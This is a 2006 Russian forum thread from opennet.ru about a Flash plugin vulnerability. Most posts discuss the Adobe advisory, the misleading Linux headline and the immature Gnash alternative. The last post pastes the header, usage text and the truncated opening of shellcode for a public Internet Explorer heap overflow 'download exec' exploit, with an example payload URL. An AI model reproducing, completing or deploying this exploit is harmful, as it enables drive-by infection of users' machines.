URL: https://www.opennet.ru/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 27830
[ Назад ]

Исходное сообщение
"OpenNews: В Linux версии Flash плагина обнаружена опасная уязвимость."

Отправлено opennews , 14-Сен-06 01:49 
Во всех версиях Adobe/Macromedia Flash плагина найдена возможность (http://www.securiteam.com/windowsntfocus/5SP0F0UJPC.html) запуска кода на машине пользователя через специально скомпонованный злоумышленником SWF файл.

URL: http://www.securiteam.com/windowsntfocus/5SP0F0UJPC.html
Новость: https://www.opennet.ru/opennews/art.shtml?num=8327


Содержание

Сообщения в этом обсуждении
"В Linux версии Flash плагина обнаружена опасная уязвимость."
Отправлено Аноним , 14-Сен-06 01:49 
ATTENTION!
Max, opennet does not work under firefox -- looks like something was broken today or yesterday.
TAKE A LOOK, Please.

"В Linux версии Flash плагина обнаружена опасная уязвимость."
Отправлено Аноним , 14-Сен-06 07:19 
для этого в адобе сделали таку венечку как : кликните для акливации флеш ролика

"В Linux версии Flash плагина обнаружена опасная уязвимость."
Отправлено PENGUIN of NSK , 14-Сен-06 13:39 
Вообще-то, в Мелкософте.
JFYI.

"В Linux версии Flash плагина обнаружена опасная уязвимость."
Отправлено Ананимуз , 14-Сен-06 19:10 
Тогда уж "и в Майкрософте тоже"

"В Linux версии Flash плагина обнаружена опасная уязвимость."
Отправлено жж , 14-Сен-06 08:05 
у FC5 сегодня вышел апдейт для пакета flash-plugin

"В Linux версии Flash плагина обнаружена опасная уязвимость."
Отправлено edwin , 14-Сен-06 11:49 
Господа а каково Ваше мнение о:
http://savannah.gnu.org/projects/gnash
По так сыроват будет

"В Linux версии Flash плагина обнаружена опасная уязвимость."
Отправлено vOrOn , 14-Сен-06 22:05 
> Господа а каково Ваше мнение о:
> http://savannah.gnu.org/projects/gnash
> По так сыроват будет

Меня интересовал из этого проекта только плугин к Огнелису. После установки упомянутого, Огнелис успешно крэшился на всех сайтах, где хоть чуточку пахло флешем.
На основании этого смело заявляю - в работе не видел, но осуждаю. :)


"В Linux версии Flash плагина обнаружена опасная уязвимость."
Отправлено _Arti , 17-Сен-06 19:35 
Версия из CVS работает неплохо. Именно на FreeBSD AMD64 и именно как к плагин к FireFox. В отличие от "родного" флеш плагина, не использует специфичные для конкретной ОС подсистемы (например ALSA). Проект конечно еще сыроват, но с Вашей то помошью он конечно же наберт нужную фкнкциональность очень быстро. На счет скорости.... у Вас наверное нет аппаратной поддержки OpenGL, попробуйте Cairo.

"В Linux версии Flash плагина обнаружена опасная уязвимость."
Отправлено squirL , 17-Сен-06 02:14 
>Господа а каково Ваше мнение о:
>http://savannah.gnu.org/projects/gnash
>По так сыроват будет

я когда искал, чем бы на AMD64 FreeBSD посмотреть flash в огнелисе, мне эту фичу в рассылках посоветовали добрые пендостанцы... ужос и кошмар. проц грузит просто немеряно, плюс, как уже сказали валит firefox на каждой второй флэшине. короче живу я без флэша и счастлив :)



"В Linux версии Flash плагина обнаружена опасная уязвимость."
Отправлено Advanced Аноним , 14-Сен-06 19:23 
Не очень понятно почему "В Linux версии..." по ссылке вообще слово Linux не упоминается.

"В Linux версии Flash плагина обнаружена опасная уязвимость."
Отправлено pavlinux , 14-Сен-06 21:04 
А ты у производителя поглядел http://www.adobe.com/support/security/bulletins/apsb06-11.html

Multiple Vulnerabilities in Adobe Flash Player 8.0.24.0 and Earlier Versions
Release Date: September 12, 2006
Vulnerability Identifier: APSB06-11
CVE Number: CVE-2006-3014, CVE-2006-3311, CVE-2006-3587, CVE-2006-3588, CVE-2006-4640

Platform: All Platforms
..............^^^^^^^^^^^^^


"В Linux версии Flash плагина обнаружена опасная уязвимость."
Отправлено Advanced Аноним , 15-Сен-06 00:17 
Так я про то же. Смотри заголовок. "В **Linux** версии Flash плагина обнаружена опасная уязвимость."

"В Linux версии Flash плагина обнаружена опасная уязвимость."
Отправлено GateKeeper , 15-Сен-06 09:05 
А на этом сайте нас совершенно не интересуют Win* и Tiger* версии.

"В Linux версии Flash плагина обнаружена опасная уязвимость."
Отправлено Квагга , 15-Сен-06 21:45 
flash - это индустриальный стандарт.

В том числе и баннеры на Opennet :)


"В Linux версии Flash плагина обнаружена опасная уязвимость."
Отправлено Akademic , 15-Сен-06 21:59 
Чем вам flash не угодил?

"В Linux версии Flash плагина обнаружена опасная уязвимость."
Отправлено XXXL , 15-Сен-06 22:20 
Лично мне как пользователю *BSD, flash неугодил отсутствием нативной поддержки. И при этом он является типо индустриальным стандартом.

"В Linux версии Flash плагина обнаружена опасная уязвимость."
Отправлено pavlinux , 18-Сен-06 00:43 
*
*-----------------------------------------------------------------------
*
* daxctle2.c - Internet Explorer COM Object Heap Overflow Download Exec Exploit
* !!! 0day !!!  Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author   : nop
*          : nop#xsec.org
*          : http://www.xsec.org
*          :
* Tested   : Windows 2000 Server SP4 CN
*          :     + Internet Explorer 6.0 SP1
*          : Windows XP SP2 CN
*          :     + Internet Explorer 6.0 SP1 (You need some goodluck! :-)
*          :
* Complie  : cl daxctle2.c
*          :
* Usage       :d:\>daxctle2
*          :
*          :Usage: daxctle <URL> [htmlfile]
*          :
*          :d:\>daxctle2 http://xsec.org/xxx.exe xxx.htm
*          :
*          
*------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>

FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;

// Download Exec Shellcode by nop
unsigned char sc[] =    
"\xe9\xa3\x00\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x04\x59\xe8\x43\x00\x00\x00"
"\xe2\xf9\x68\x6f\x6e\x00\x00\x68\x75\x72\x6c\x6d\x54\xff\x16\x95"
"\xe8\x2e\x00\x00\x00\x83\xec\x20\x8b\xdc\x6a\x20\x53\xff\x56\x0